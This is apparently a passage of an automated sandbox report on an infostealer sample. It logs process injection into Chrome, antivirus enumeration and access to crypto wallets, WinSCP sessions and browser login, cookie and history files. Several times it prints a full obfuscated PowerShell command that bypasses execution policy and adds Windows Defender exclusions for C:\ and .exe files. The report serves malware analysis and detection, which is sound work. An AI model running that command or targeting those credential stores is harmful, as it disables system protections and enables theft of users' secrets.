                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess token adjusted: Debug
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess token adjusted: Debug
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Bypasses PowerShell execution policy
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'"
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Users\user\AppData\Roaming\a.exeThread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 4100AEJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 5E00AEJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 5300AEJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\AppData\Roaming\a.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 4410000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 5530000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeMemory written: C:\Users\user\AppData\Local\Temp\Gelelx.exe base: BC0000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeMemory written: C:\Users\user\AppData\Local\Temp\Vhbyv.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\license.exeMemory written: C:\Users\user\AppData\Roaming\license.exe base: 400000 value starts with: 4D5A
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread register set: target process: 4032
                      Writes to foreign memory regions
                      Source: C:\Users\user\AppData\Roaming\a.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 4410000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 410000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 5530000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 530000Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess created: C:\Users\user\AppData\Roaming\a.exe "C:\Users\user\AppData\Roaming\a.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess created: C:\Users\user\AppData\Local\Temp\Gelelx.exe "C:\Users\user\AppData\Local\Temp\Gelelx.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess created: C:\Users\user\AppData\Local\Temp\Vhbyv.exe "C:\Users\user\AppData\Local\Temp\Vhbyv.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess created: C:\Users\user\AppData\Local\Temp\Gelelx.exe "C:\Users\user\AppData\Local\Temp\Gelelx.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess created: C:\Users\user\AppData\Local\Temp\Vhbyv.exe "C:\Users\user\AppData\Local\Temp\Vhbyv.exe"
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess created: C:\Users\user\AppData\Roaming\license.exe "C:\Users\user\AppData\Roaming\license.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -exclusionpath ([char]67+[char]58+[char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -exclusionextension 'exe'"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -exclusionpath ([char]67+[char]58+[char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -exclusionextension 'exe'" Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeQueries volume information: C:\Users\user\AppData\Roaming\a.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Gelelx.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Vhbyv.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Gelelx.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\license.exeQueries volume information: C:\Users\user\AppData\Roaming\license.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\license.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\license.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Vhbyv.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\license.exeQueries volume information: C:\Users\user\AppData\Roaming\license.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\hosts.exeQueries volume information: C:\Users\user\AppData\Roaming\hosts.exe VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Generic Stealer
                      Source: Yara matchFile source: Process Memory Space: a.exe PID: 7908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: chrome.exe PID: 8024, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: chrome.exe PID: 8044, type: MEMORYSTR
                      Yara detected Strela Stealer
                      Source: Yara matchFile source: Process Memory Space: chrome.exe PID: 8024, type: MEMORYSTR
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *|*|electrum9004
                      Source: a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectronCash
                      Source: a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty!
                      Source: a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                      Source: a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
                      Source: a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Binance\configigfig\Config.json
                      Source: a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                      Source: powershell.exe, 00000001.00000002.1173728731.00000000058D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
                      Tries to harvest and steal Bitcoin Wallet information
                      Source: C:\Users\user\AppData\Roaming\a.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\AppData\Roaming\a.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\optimization_guide_model_store\24\E6DC4029A1E4B4C1\FB2428E81C4EC4AD\enus_denylist_encoded_241007.txtJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\optimization_guide_model_store\15\E6DC4029A1E4B4C1\44AEBF4FF9BFF124\VERSION.txtJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\VERSION.txtJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f\vocab_en.txtJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\optimization_guide_model_store\24\E6DC4029A1E4B4C1\FB2428E81C4EC4AD\vocab_en-us.txtJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\VERSION.txtJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\optimization_guide_model_store\15\E6DC4029A1E4B4C1\44AEBF4FF9BFF124\VERSION.txtJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f\vocab_en.txtJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\optimization_guide_model_store\24\E6DC4029A1E4B4C1\FB2428E81C4EC4AD\vocab_en-us.txtJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\optimization_guide_model_store\24\E6DC4029A1E4B4C1\FB2428E81C4EC4AD\vocab_en-us.txtJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\optimization_guide_model_store\15\E6DC4029A1E4B4C1\44AEBF4FF9BFF124\VERSION.txtJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
